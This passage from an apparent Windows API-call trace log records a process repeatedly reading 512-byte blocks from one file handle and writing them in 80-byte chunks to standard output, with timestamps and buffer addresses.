(hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.556] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.556] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.556] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, 
lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.556] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.557] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.557] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: 
hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.557] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.557] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.558] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.558] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.558] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 
[0134.558] GetFileType (hFile=0x50) returned 0x1 [0134.558] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.559] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.559] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, 
lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] GetFileType (hFile=0x50) returned 0x1 [0134.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.559] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.560] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.560] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.560] GetFileType (hFile=0x50) returned 0x1 [0134.560] _get_osfhandle (_FileHandle=1) returned 
0x50 [0134.560] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.561] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.561] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) 
returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] GetFileType (hFile=0x50) returned 0x1 [0134.561] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.561] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.562] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.562] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] GetFileType (hFile=0x50) returned 0x1 [0134.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.562] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, 
